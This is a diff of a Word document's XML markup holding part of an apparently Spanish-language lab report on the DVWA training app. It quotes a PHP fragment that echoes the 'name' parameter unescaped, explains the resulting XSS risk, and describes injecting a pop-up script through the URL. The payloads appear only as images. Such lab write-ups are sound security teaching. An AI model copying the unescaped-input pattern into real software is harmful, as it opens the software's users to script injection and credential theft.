-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>&lt;pre&gt;</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve">: Un elemento HTML </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>&lt;pre&gt;</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> que indica que el texto dentro de él debe ser mostrado en una fuente monoespaciada y con los saltos de línea y espacios preservados.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="36"/>
-        </w:numPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>Hello</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> ' . $_GET[ 'name' ] . '</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>: La cadena "</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>Hello</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> " seguida del valor del parámetro </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>name</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> y luego una coma.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="36"/>
-        </w:numPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>'&lt;/pre&gt;</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve">: El cierre del elemento </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>&lt;pre&gt;</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve">El resultado final es una respuesta HTTP que contiene un mensaje de bienvenida personalizado con el nombre del usuario, rodeado por etiquetas </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>&lt;pre&gt;</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> para que se muestre de manera legible.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
-        <w:outlineLvl w:val="2"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="27"/>
-          <w:szCs w:val="27"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="27"/>
-          <w:szCs w:val="27"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>Seguridad</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Es importante destacar que este código tiene una vulnerabilidad de seguridad grave debido a la forma en que se maneja el parámetro </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>name</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve">. La concatenación directa de la entrada del usuario en la salida sin ningún tipo de validación o escape puede permitir ataques de inyección de código (XSS). Un atacante podría proporcionar un valor de </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>name</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> que incluya código HTML o JavaScript malicioso, lo que podría ser ejecutado por el navegador del usuario, lo que podría permitir el robo de credenciales, la inyección de malware </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>o</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> otros tipos de ataques.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>En un entorno de producción, es crucial asegurarse de que cualquier entrada del usuario sea adecuadamente validada y escapada antes de ser incluida en la salida para evitar este tipo de vulnerabilidades.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="720"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="360" w:lineRule="auto"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:b/>
-          <w:bCs/>
+          <w:noProof/>
           <w:kern w:val="0"/>
           <w:sz w:val="26"/>
           <w:szCs w:val="26"/>
           <w:lang w:eastAsia="es-ES"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:b/>
-          <w:bCs/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>2.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:b/>
-          <w:bCs/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>2</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:b/>
-          <w:bCs/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:b/>
-          <w:bCs/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>2</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:b/>
-          <w:bCs/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>- Vulnerable a LFI o inclusión de archivos locales</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="360" w:lineRule="auto"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:b/>
-          <w:bCs/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:b/>
-          <w:bCs/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
         <w:lastRenderedPageBreak/>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2420BD0F" wp14:editId="7C659BD1">
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="28C11BF7" wp14:editId="76509953">
             <wp:extent cx="5400040" cy="1372235"/>
             <wp:effectExtent l="0" t="0" r="0" b="0"/>
             <wp:docPr id="1497840483" name="Imagen 1"/>
@@ -2355,7 +2545,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId10"/>
+                    <a:blip r:embed="rId12"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -2379,6 +2569,272 @@
     <w:p>
       <w:pPr>
         <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="360" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="31443CD3" wp14:editId="6AC179E0">
+            <wp:extent cx="5400040" cy="1337945"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="647719082" name="Imagen 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="647719082" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId13"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5400040" cy="1337945"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="360" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>En otro caso, si en la URL detrás del parámetro “name” de la maquina DVWA, ponemos directamente un script, en el que se ejecute este mensaje:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="360" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1943E88A" wp14:editId="2CF0F5B5">
+            <wp:extent cx="5400040" cy="504825"/>
+            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
+            <wp:docPr id="1417168744" name="Imagen 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1417168744" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId14"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5400040" cy="504825"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="360" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Comprobamos que este se ejecutará de manera indefinida, bloqueando la página web con ventanas emergentes cíclicas, hasta que no activemos la casilla </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:i/>
+          <w:iCs/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>“No permitir</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:i/>
+          <w:iCs/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>…”</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
